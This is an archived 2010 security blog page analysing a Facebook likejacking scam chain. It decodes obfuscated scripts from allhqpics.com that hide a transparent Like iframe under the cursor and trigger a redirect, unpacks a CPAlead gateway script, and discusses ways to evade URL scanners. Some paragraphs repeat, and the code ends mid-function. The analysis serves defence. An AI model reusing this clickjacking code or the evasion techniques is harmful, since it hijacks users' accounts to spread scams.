As promised I have uploaded the slides and the corresponding advisory for my graudit talk at the ruxcon meetup this month.
June 2010 Archives
Url scanning seems to be an emerging trend. Detecting malware distribution channels and preventing infections is easier than cleaning up the mess they make. The basis of the idea is good, but the current implementations. I have been mulling on this for a while, ever since I read Russ McRae's post (rant?) on url shorteners needing to detect malware.
The initial problems that url scanners face are simple evasion techniques, such as the click to get infected method that you can see in my previous post. This blogspot url scores quite cleanly.
And why shouldn't it? It doesn't contain anything directly malicious and so it should score cleanly until reputation or reactive defense catches up with it. Listen you say, who cares about the herding page, it doesn't do anything, it's the delivery page we care about. If a user visits a "benign" page that redirects him to malware, it will still be stopped at the malicious page!
Alas dear friend, a simple server side block is all it takes to stop http://scanner.novirusthanks.org from accessing the offending page (http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html).
Other documented techniques seen in the wild include only delivering the malicious pay load on 1 of x requests, user agent filtering, js obfu that will break automated deobfu and more. I have seen an alert box break browser automation, so there is no shortage of options for the bad guys. However considering how simple it is to shutdown todays url scanners I doubt we will see too many advanced techniques yet. Url scanning might overcome these simple bypasses in the future, but they should not be considered defense and certainly not a replacement for your desktop AV.
The initial problems that url scanners face are simple evasion techniques, such as the click to get infected method that you can see in my previous post. This blogspot url scores quite cleanly.
And why shouldn't it? It doesn't contain anything directly malicious and so it should score cleanly until reputation or reactive defense catches up with it. Listen you say, who cares about the herding page, it doesn't do anything, it's the delivery page we care about. If a user visits a "benign" page that redirects him to malware, it will still be stopped at the malicious page!
Alas dear friend, a simple server side block is all it takes to stop http://scanner.novirusthanks.org from accessing the offending page (http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html).
Other documented techniques seen in the wild include only delivering the malicious pay load on 1 of x requests, user agent filtering, js obfu that will break automated deobfu and more. I have seen an alert box break browser automation, so there is no shortage of options for the bad guys. However considering how simple it is to shutdown todays url scanners I doubt we will see too many advanced techniques yet. Url scanning might overcome these simple bypasses in the future, but they should not be considered defense and certainly not a replacement for your desktop AV.
Today I noticed this one in my facebook feed and thought; that's different! It's been a while since I chased a rabbit, so down the rabbit hole I went.
~$ GET http://craziestattoos.blogspot.com/
<meta property="og:title" content="The Guy With The Largest Dick On The Planet">
<meta property="og:type" content="article">
<meta property="og:url" content="http://craziestattoos.blogspot.com/"><link rel="me" href="http://www.blogger.com/profile/09319063164064567908">
<link rel="openid.server" href="http://www.blogger.com/openid-server.g">
<!-- --><style type="text/css">@import url(http://www.blogger.com/static/v1/v-css/navbar/697174003-classic.css);
div.b-mobile {display:none;}
</style>
<script type="text/javascript">
function setAttributeOnload(object, attribute, val) {
if(window.addEventListener) {
window.addEventListener("load",
function(){ object[attribute] = val; }, false);
} else {
window.attachEvent('onload', function(){ object[attribute] = val; });
}
}
</script>
<iframe src="http://www.blogger.com/navbar.g?targetBlogID=6834350941604690306&blogName=The+Guy+With+The+Largest+Dick+On+The+...&publishMode=PUBLISH_MODE_BLOGSPOT&navbarType=BLUE&layoutType=CLASSIC&searchRoot=http%3A%2F%2Fcraziestattoos.blogspot.com%2Fsearch&blogLocale=nl&homepageUrl=http%3A%2F%2Fcraziestattoos.blogspot.com%2F" marginwidth="0" marginheight="0" id="navbar-iframe" allowtransparency="true" title="Blogger Navigation and Search" frameborder="0" height="30" scrolling="no" width="100%"></iframe>
<div></div>
<center><a href="http://access.im/1/AzO93"><img src="http://i46.tinypic.com/33ygjk6.jpg" /></a></center>
<script type="text/javascript" src="http://www.blogger.com/static/v1/common/js/4161557039-csitail.js"></script>
<script type="text/javascript">BLOG_initCsi('classic_blogspot');</script></body>
The blogspot page delivers a access.im link visible as a "skip this add page" image and redirects to http:// allhqpics.com/ the-guy-with-the-largest-dick-on-the-planet.html when you click on it. Lets head further down the burrow~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html
<head>
<title>The Guy With The Largest Dick On The Planet</title>
<script src="jquery.js" type="text/javascript"></script>
<script src="top.js" type="text/javascript"></script>
</head>
<body>
<script type="text/javascript">
$(document).ready(function() {
$("a[name^='faq-']").each(function() {
$(this).click(function() {
if( $("#" + this.name).is(':hidden') ) {
$("#" + this.name).fadeIn('normal');
$("a[name^='faq-']").hide('normal');
} else {
$("#" + this.name).fadeOut('normal');
}
return false;
});
});
});
</script>
<style type="text/css">
.faq-answer {
display:none;
}
</style>
<center><img src="18.png" /></center>
<center><div class="faq-answer" id="faq-1"><img src="pre.jpg"></div></center>
<script src="bottom.js" type="text/javascript"></script>
</body>
Looks pretty normal, right? I took a look at the jquery.js and at a cursory glance it looks authentic, but then top.js delivers the first rabbit droppings
~$ GET http://allhqpics.com/top.js
<!--
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%76%61%72%20%69%6E%74%65%72%76%61%6C%3B%0A%20%20%20%20%20%20%20%20%24%28%66%75%6E%63%74%69%6F%6E%28%29%0A%7B%0A%20%20%20%20%69%6E%74%65%72%76%61%6C%3D%73%65%74%49%6E%74%65%72%76%61%6C%28%22%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%3B%22%2C%20%35%30%30%29%3B%0A%7D%29%3B%0A%0A%66%75%6E%63%74%69%6F%6E%20%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%0A%7B%0A%20%20%20%20%69%66%20%28%20%24%28%64%6F%63%75%6D%65%6E%74%2E%61%63%74%69%76%65%45%6C%65%6D%65%6E%74%29%2E%61%74%74%72%28%27%69%64%27%29%3D%3D%22%66%62%66%72%61%6D%65%22%20%29%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%63%6C%65%61%72%49%6E%74%65%72%76%61%6C%28%69%6E%74%65%72%76%61%6C%29%3B%0A%20%20%20%20%20%20%20%20%69%66%6C%61%67%3D%31%3B%0A%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%61%6C%6C%68%71%70%69%63%73%2E%63%6F%6D%2F%74%68%65%2D%67%75%79%2D%77%69%74%68%2D%74%68%65%2D%6C%61%72%67%65%73%74%2D%64%69%63%6B%2D%6F%6E%2D%74%68%65%2D%70%6C%61%6E%65%74%2D%32%2E%68%74%6D%6C%22%3B%20%0A%20%20%20%20%7D%20%20%20%20%0A%7D%20%20%0A%20%20%20%20%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A'));
//-->
Decoding that string gives us:
<script type="text/javascript">
var interval;
$(function()
{
interval=setInterval("updateActiveElement();", 500);
});
function updateActiveElement()
{
if ( $(document.activeElement).attr('id')=="fbframe" )
{
clearInterval(interval);
iflag=1;
document.location="http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html";
}
}
</script>
I'll get back to the second html page in a bit, first lets check bottom.js from the first page:
~$ GET http://allhqpics.com/bottom.js
<!--
document.write(unescape('%3C%64%69%76%20%73%74%79%6C%65%3D%22%6F%76%65%72%66%6C%6F%77%3A%20%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%20%31%30%70%78%3B%20%68%65%69%67%68%74%3A%20%31%32%70%78%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%20%66%69%6C%74%65%72%3A%61%6C%70%68%61%28%6F%70%61%63%69%74%79%3D%30%29%3B%20%2D%6D%6F%7A%2D%6F%70%61%63%69%74%79%3A%30%2E%30%3B%20%2D%6B%68%74%6D%6C%2D%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%20%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%22%20%69%64%3D%22%69%63%6F%6E%74%61%69%6E%65%72%22%3E%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%70%6C%75%67%69%6E%73%2F%6C%69%6B%65%2E%70%68%70%3F%68%72%65%66%3D%68%74%74%70%3A%2F%2F%66%75%6E%6E%79%2D%63%65%6C%65%62%2D%70%69%63%73%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%26%61%6D%70%3B%6C%61%79%6F%75%74%3D%73%74%61%6E%64%61%72%64%26%61%6D%70%3B%73%68%6F%77%5F%66%61%63%65%73%3D%66%61%6C%73%65%26%61%6D%70%3B%77%69%64%74%68%3D%34%35%30%26%61%6D%70%3B%61%63%74%69%6F%6E%3D%6C%69%6B%65%26%61%6D%70%3B%66%6F%6E%74%3D%74%61%68%6F%6D%61%26%61%6D%70%3B%63%6F%6C%6F%72%73%63%68%65%6D%65%3D%6C%69%67%68%74%26%61%6D%70%3B%68%65%69%67%68%74%3D%38%30%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%6E%6F%6E%65%3B%20%6F%76%65%72%66%6C%6F%77%3A%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%35%30%70%78%3B%20%68%65%69%67%68%74%3A%32%33%70%78%3B%22%20%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3D%22%74%72%75%65%22%20%69%64%3D%22%66%62%66%72%61%6D%65%22%20%6E%61%6D%65%3D%22%66%62%66%72%61%6D%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%2F%64%69%76%3E%0A%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%76%61%72%20%69%66%6C%61%67%20%3D%20%30%3B%0A%20%20%20%20%76%61%72%20%69%63%6F%6E%74%61%69%6E%65%72%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%69%63%6F%6E%74%61%69%6E%65%72%27%29%3B%20%20%20%20%0A%20%20%20%20%76%61%72%20%73%74%61%6E%64%61%72%64%62%6F%64%79%3D%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6D%70%61%74%4D%6F%64%65%3D%3D%22%43%53%53%31%43%6F%6D%70%61%74%22%29%3F%20%64%6F%63%75%6D%65%6E%74%2E%64%6F%63%75%6D%65%6E%74%45%6C%65%6D%65%6E%74%20%3A%20%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%20%2F%2F%63%72%65%61%74%65%20%72%65%66%65%72%65%6E%63%65%20%74%6F%20%63%6F%6D%6D%6F%6E%20%22%62%6F%64%79%22%20%61%63%72%6F%73%73%20%64%6F%63%74%79%70%65%73%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%7B%0A%20%20%20%20%20%20%20%20%2F%2A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%44%4F%20%4E%4F%54%20%45%44%49%54%20%54%48%49%53%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2A%2F%0A%20%20%20%20%69%66%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%29%20%0A%20%20%20%20%7B%20%2F%2F%20%66%6F%72%20%49%45%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%79%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%54%6F%70%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%78%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%4C%65%66%74%2B%27%70%78%27%3B%0A%20%20%20%20%7D%20%0A%20%20%20%20%65%6C%73%65%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%65%2E%70%61%67%65%59%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%65%2E%70%61%67%65%58%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20%7D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%6D%6F%76%65%20%3D%20%66%75%6E%63%74%69%6F%6E%28%65%29%20%7B%0A%20%20%20%20%20%20%20%20%69%66%20%28%69%66%6C%61%67%20%3D%3D%20%30%29%20%7B%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%3B%7D%0A%20%20%20%20%20%20%20%20%65%6C%73%65%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%27%6E%6F%6E%65%27%3B%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E'));
//-->
Which decodes to:
<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
<iframe src="http://www.facebook.com/plugins/like.php?href=http://funny-celeb-pics.blogspot.com/&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
</div>
<script>
var iflag = 0;
var icontainer = document.getElementById('icontainer');
var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
function mouseFollower(e){
/* DO NOT EDIT THIS */
if (window.event)
{ // for IE
icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
}
else
{
icontainer.style.top = (e.pageY-5)+'px';
icontainer.style.left = (e.pageX-5)+'px';
}
}
document.onmousemove = function(e) {
if (iflag == 0) {mouseFollower(e);}
else
{
icontainer.style.display = 'none'; }
}
</script>
This gets a little more interesting, now there is a CSRF request to facebook for you to like the malicious site and lure more unsuspecting victims. It's time to pick up the pace and move on.
~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html
<head>
<title>The Guy With The Largest Dick On The Planet</title>
<script src="jquery.js" type="text/javascript"></script>
<script type="text/javascript" src="http://www.cpalead.com/mygateway.php?pub=42138&gateid=OTM5ODQ%3D"></script>
</head>
<body>
<script type="text/javascript">
$(document).ready(function() {
$("a[name^='faq-']").each(function() {
$(this).click(function() {
if( $("#" + this.name).is(':hidden') ) {
$("#" + this.name).fadeIn('normal');
$("a[name^='faq-']").hide('normal');
} else {
$("#" + this.name).fadeOut('normal');
}
return false;
});
});
});
</script>
<style type="text/css">
.faq-answer {
display:none;
}
<style>
<center><a href="#" name="faq-1"><img src="pre.jpg"></a></center>
<center></a><div class="faq-answer" id="faq-1"><a href="#" name="faq-1"><img src="hero.jpg"></div></center>
</body>
And the reference to cpalead gives it away. That url delivers your typical function(p,a,c,k,e,d) obfuscated javascript which we decode using the tom liston method
function showme(txt) {
document.write("<textarea rows=50 cols=50>");document.write(txt); document.write("</textarea>");
}
//Copyright 2010 CPAlead.com
showme(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 124={"123":[{"13":"224=","18":"99","66":"0"},{"13":"200=","18":"50","66":"0"},{"13":"225=","18":"30","66":"0"},{"13":"222=","18":"95","66":"0"}]};9 76(7,189){90(6 65=0;65<124.123.97;65++){4(124.123[65].13==231(7)){153 124.123[65][189]}}}6 108=\'\';6 245=85;6 248=75;6 131=85;6 102=85;6 250=85;6 59=0;6 149=0;6 175=\'79\';6 249=\'242 246 230 228 227 62 239 240 243.\';9 251(113){6 133=19.128;4(247 19.128!=\'9\'){19.128=113}12{19.128=9(){4(133){241{133()}234(235){}}4(113){113()}}}}9 114(7){6 88=2.81("20").207(0);4(88==237){59=59+300;48("114(\'"+7+"\');",300)}12{199(7)}}9 226(7){4(108>0){59=59+108+\'155\';48("114(\'"+7+"\');",108+\'155\')}12{59=59+300;48("114(\'"+7+"\');",300)}}9 177(41){78=2.81(\'64\');90(8=0;8!=78.97;8++){4(78[8].13!=\'24\'){4(41==0){78[8].3.33=\'86\'}4(41==1){78[8].3.33=\'47\'}}}}9 140(41){6 211=2.81(\'236\');90(6 209=2.211,8=0,22;22=209[8];8++){4(22.13!=\'170\'&&22.13!=\'159\'){4(41==0){4(195.198==\'212 220 215\'){22.73(\'87\',\'25\');22.3.33=\'86\'}12{22.73(\'87\',\'25\');6 196=22.252,139=22.244;139.233(22);139.201(22,196)}}4(41==1){22.73(\'87\',\'19\');4(195.198==\'212 220 215\'){22.3.33=\'47\'}}}}}9 150(41){49=2.81(\'238\');90(8=0;8!=49.97;8++){4(49[8].13!=\'170\'&&49[8].13!=\'159\'){4(41==0){49[8].73(\'87\',\'25\');49[8].3.33=\'86\'}4(41==1){49[8].3.33=\'47\';49[8].73(\'87\',\'19\')}}}}9 96(){6 68,61;4(19.104&&19.184){68=19.176+19.223;61=19.104+19.184}12 4(2.20.183>2.20.60){68=2.20.232;61=2.20.183}12{68=2.20.229;61=2.20.60}6 14,58;4(137.104){14=2.74.98?2.74.98:137.176;58=137.104}12 4(2.74&&2.74.89){14=2.74.98;58=2.74.89}12 4(2.20){14=2.20.98;58=2.20.89}181=61<58?58:61;180=68<14?68:14;153 51=146 263(180,181,14,58)}9 141(){6 51=96();4((51[1]-2.5(\'11\').3.23.218("130",""))>30){2.5(\'11\').3.23=(51[1]+\'130\')}4(149==0){48("141();",169)}}9 77(7,178){4(178!=175){34.213.291=\'37://71.43.46/290.72?82=83\'}6 15=2.5(\'11\');6 26=2.5(\'35\');140(1);150(1);177(1);149=1;102=75;4(76(7,\'66\')==1&&191!=75){15.3.120="118(18=0)";15.3.18="0.0";2.5(\'24\').44=\'37://71.292.293/294-109.72\';191=75}12{26.3.21=\'42\';15.3.21=\'42\';2.5(\'24\').44=\'289:288\';2.5(\'24\').3.21=\'42\'}153 85}9 57(174){4(!102&&131){4(19.188&&19.188.185){6 147=1}12{6 147=0}67=146 173();67.44="37://71.43.46/62-145.72?82=83&185="+147+"&145="+174;2.20.161(67);164()}}9 151(148){4(!102&&131){67=146 173();67.44="37://71.43.46/62-145-283.72?82=83&148="+148;2.20.161(67);194(\'37://71.43.46/282.72?82=83\')}}9 156(){4(!2.5(\'11\')){57(\'109-110-132\')}12 4(!2.5(\'35\')){57(\'62-110-132\')}12 4(!2.5(\'24\')){57(\'64-110-132\')}12 4(2.5(\'11\').3.17!="100%"||2.5(\'11\').3.21!="55"||2.5(\'11\').3.33!="47"){57(\'109-163\')}12 4(2.5(\'35\').3.17!="100%"||2.5(\'35\').3.21!="55"||2.5(\'35\').3.33!="47"){57(\'62-163\')}12 4(2.5(\'24\').3.21!="55"){57(\'64-110-47\')}4(2.5(\'24\').60<=300&&2.5(\'24\').60!=0){151(\'64-23-158-\'+2.5(\'24\').60)}12 4(2.5(\'11\').60<=100&&2.5(\'11\').89<=100){151(\'109-23-158-\'+2.5(\'11\').60+\'-\'+2.5(\'11\').89)}48("156()",172)}9 164(){6 143=["\\168\\165\\136\\84\\134\\284","\\136\\84\\167\\134\\187\\204\\84\\216"];19[143[1]][143[0]]()}9 194(217){6 154=["\\296\\168\\165\\287","\\136\\84\\167\\134\\187\\204\\84\\216"];34[154[1]][154[0]]=217}9 219(7){2.5(\'24\').286.213.218(\'37://71.43.46/295.72?82=83&302=203.45.56.190&7=\'+7+\'&299=\'+166(2.298)+\'\')}9 214(7){6 51=96();6 88=2.81("20").207(0);6 15=2.253("10");15.73(\'13\',\'11\');15.3.21=\'42\';15.3.28=\'121\';15.3.34=\'0\';15.3.202=\'0\';15.3.197=\'301\';15.3.17=\'100%\';88.201(15,88.303);142=76(7,\'18\');92=142/100;2.5(\'11\').3.120="118(18="+142+")";2.5(\'11\').3.18=92;15.3.23=(51[1]+\'130\');15.3.21=\'55\';15.3.33=\'47\'}9 199(7){6 106=[\'200%297\'];4(!2.5(\'11\')){214(7)}12{4(2.5(\'11\').3.21=\'42\'){2.5(\'11\').3.21=\'55\';92=76(7,\'18\')/100;2.5(\'11\').3.120="118(18="+92+")";2.5(\'11\').3.18=92}}6 51=96();141();140(0);150(0);6 26=2.5(\'35\');26.3.21=\'55\';26.3.33=\'47\';26.3.28=\'121\';26.3.34=\'0\';26.3.202=\'0\';26.3.197=\'285\';26.3.17=\'100%\';6 144=0;90(6 8=0;8<106.97;8++){4(106[8]==7||106[8]==166(7)){6 157=76(7,\'66\');4(157==1){2.5(\'129\').53=\'<10 3="28: 54; 17: 152; 34: 193; 63: -186; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 3="112: 105;"><91 44="37://94.43.46/103/160-62/160-280-262-261.179" 93="0" 101="111 117"></14></10>\';2.5(\'116\').53=\'<10 3="28: 54; 17: 152; 34: 193; 63: -186; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 13="221" 3="112: 105;"><91 17="135" 23="40" 44="37://94.43.46/103/192.182" 93="0" 101="111 117"></14></10>\'}12{2.5(\'129\').53=\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 3="112: 105;"><91 44="37://94.43.46/103/281/264.179" 93="0" 101="111 117"></14></10>\';2.5(\'116\').53=\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 13="221" 3="112: 105;"><91 17="135" 23="40" 44="37://94.43.46/103/192.182" 93="0" 101="111 117"></14></10>\'}6 144=1;132=8;260}}4(144==0){2.5(\'129\').53=\'\';2.5(\'116\').53=\'\'}26.3.23=(51[1]+\'130\');48("219(\'"+7+"\');",169);2.5(\'24\').3.21=\'55\';131=75;48("156();",255)}9 171(){119=119-1;2.5("256").53=119;4(119<=0){257()}12{48("171()",172)}}2.16(\'<3 258="36/266">#11{27-32: #155; 120:118(18=80); 18: 0.80; -267-18: 0.80;}\');2.16(\'#35 14 {27:42;52-210:138;32:#206;36-208:42}\');2.16(\'#35 91 {93: 162;}\');2.16(\'#35 14:276 {27:42;52-210:138;32:#206;36-208:275}</3>\');2.16(\'<10 13="35" 3="21:42; 36-39: 38; 277-23: 138; ">\');2.16(\'<10 13="129" 39="38" 3="28: 121; 17: 100%; 31-29: 115;">\');2.16(\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;">\');2.16(\'</10>\');2.16(\'</10>\');2.16(\'<10 13="116" 39="38" 3="28: 121; 17: 100%; 31-29: 125;">\');2.16(\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;">\');2.16(\'</10>\');2.16(\'</10>\');2.16(\'<10 3="278: 152 279 162; 27: 25; 23: 274; 31-29: 273;">\');2.16(\'<64 17="100%" 23="269" 13="24" 44="" 268="75" 270="0" 3="28: 54; 23: 272; 205-65: 86; 205-271: 86; 27-32: 25; 31-29: 254; " 259="265"></64>\');2.16(\'</10></10>\');',10,304,'||document|style|if|getElementById|var|gateid|i|function|div|aijvqsnovujrsfoj3|else|id|a|dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5|write|width|opacity|window|body|display|em|height|wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831|transparent|zcpkmswwmxlgjzbue41a138882143252732d893|background|position|index||z|color|visibility|top|wzjyzgbhqzohhlhvef8426b5a89be2|text|http|center|align||onoroff|none|cpalead|src||com|visible|setTimeout|object_tags||arrayPageSize|font|innerHTML|relative|block||guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9|b|bodyloadtime|offsetHeight|d|widget|right|iframe|x|donation_widget|dpjfszjhzduviwkn424c2477e2d48|c|12px|size|www|php|setAttribute|documentElement|true|getWidgetSetting|mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a|iframe_tags|ytndhhmwdjexjqej106a67d2||getElementsByTagName|pub|42138|x6F|false|hidden|wmode|gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62|clientHeight|for|img|opacity_setting_moz|border|static||getPageSize|length|clientWidth|||alt|cbtonfugwctexmjdff8bd9e3648ab7|images|innerHeight|pointer|closebuttons|onclick|popup_delay|overlay|not|Close|cursor|func|checkForBody|11863866|arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c|Widget|alpha|countdown|filter|absolute|135px|settings|widgetJSON|11863936|172px|452px|onload|lpepmphihufelzdd28c18f8093587772fdd38f|px|ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6|found|oldonload|x61||x6C|self|normal|pn|jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37|dontscroll|opacity_setting_ie|_0x96be|has_closebtn|tamper|new|hasfirebug|reason|mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e|mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22|ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69|72px|return|_0xb500|000|hienslexztaecvon972b4c6959457b72d8591114abeb305d|is_donation|invalid|video_bucket|rice|appendChild|0px|styles|sgfplcetedjsqmbvbbcb115|x65|escape|x63|x72|500|video_controller|secondpass|1000|Image|tampertype|xwwjxyvbmsrjfpud17e9cae225420|innerWidth|yecqogvnndwlktmu|adixdgozwczhuvaf6e84b|png|pageWidth|pageHeight|gif|scrollHeight|scrollMaxY|firebug|225px|x74|console|settingname||secondclose|blank7|158px|lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73|navigator|nx|zIndex|appName|myGatewayStart|NzMxNTM|insertBefore|left||x69|overflow|fff|item|decoration|ems|weight|embeds|Microsoft|location|createOverlay|Explorer|x6E|url|replace|loadGatewayIframe|Internet|closebtn|ODA1OTE|scrollMaxX|OTM5ODQ|NzM5NTQ|startGateway|this|disable|offsetWidth|to|unescape|scrollWidth|removeChild|catch|e|embed|null|object|has|been|try|Your|logged|parentNode|countdownStarted|attempt|typeof|isloaded|gmgqvtjawhodlboj8b0d5f2c|bodyexisted|addWidgetLoadEvent|nextSibling|createElement|11863886|5000|closelink|riunpfcaxfcggjhpf|type|scrollbars|break|button|close|Array|close_btn|NO|css|moz|allowtransparency|640|frameborder|y|640px|11863881|482px|underline|hover|line|margin|auto|skin|help|nostyle|test|x64|11863846|contentWindow|x66|blank|about|adblock|href|surveysforcharity|org|thankyou|mygateway_iframe_loader|x68|3D|referrer|ref||11863836|subid|firstChild'.split('|'),0,{}))
Which gives us more obfuscated javascript
var widgetJSON={"settings":[{"id":"OTM5ODQ=","opacity":"99","donation_widget":"0"},{"id":"NzMxNTM=","opacity":"50","donation_widget":"0"},{"id":"NzM5NTQ=","opacity":"30","donation_widget":"0"},{"id":"ODA1OTE=","opacity":"95","donation_widget":"0"}]};function getWidgetSetting(gateid,settingname){for(var x=0;x<widgetJSON.settings.length;x++){if(widgetJSON.settings[x].id==unescape(gateid)){return widgetJSON.settings[x][settingname]}}}var popup_delay='';var countdownStarted=false;var isloaded=true;var ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=false;var cbtonfugwctexmjdff8bd9e3648ab7=false;var bodyexisted=false;var bodyloadtime=0;var mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=0;var xwwjxyvbmsrjfpud17e9cae225420='ytndhhmwdjexjqej106a67d2';var gmgqvtjawhodlboj8b0d5f2c='Your attempt to disable this widget has been logged.';function addWidgetLoadEvent(func){var oldonload=window.onload;if(typeof window.onload!='function'){window.onload=func}else{window.onload=function(){if(oldonload){try{oldonload()}catch(e){}}if(func){func()}}}}function checkForBody(gateid){var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName("body").item(0);if(gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62==null){bodyloadtime=bodyloadtime+300;setTimeout("checkForBody('"+gateid+"');",300)}else{myGatewayStart(gateid)}}function startGateway(gateid){if(popup_delay>0){bodyloadtime=bodyloadtime+popup_delay+'000';setTimeout("checkForBody('"+gateid+"');",popup_delay+'000')}else{bodyloadtime=bodyloadtime+300;setTimeout("checkForBody('"+gateid+"');",300)}}function yecqogvnndwlktmu(onoroff){iframe_tags=document.getElementsByTagName('iframe');for(i=0;i!=iframe_tags.length;i++){if(iframe_tags[i].id!='wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831'){if(onoroff==0){iframe_tags[i].style.visibility='hidden'}if(onoroff==1){iframe_tags[i].style.visibility='visible'}}}}function 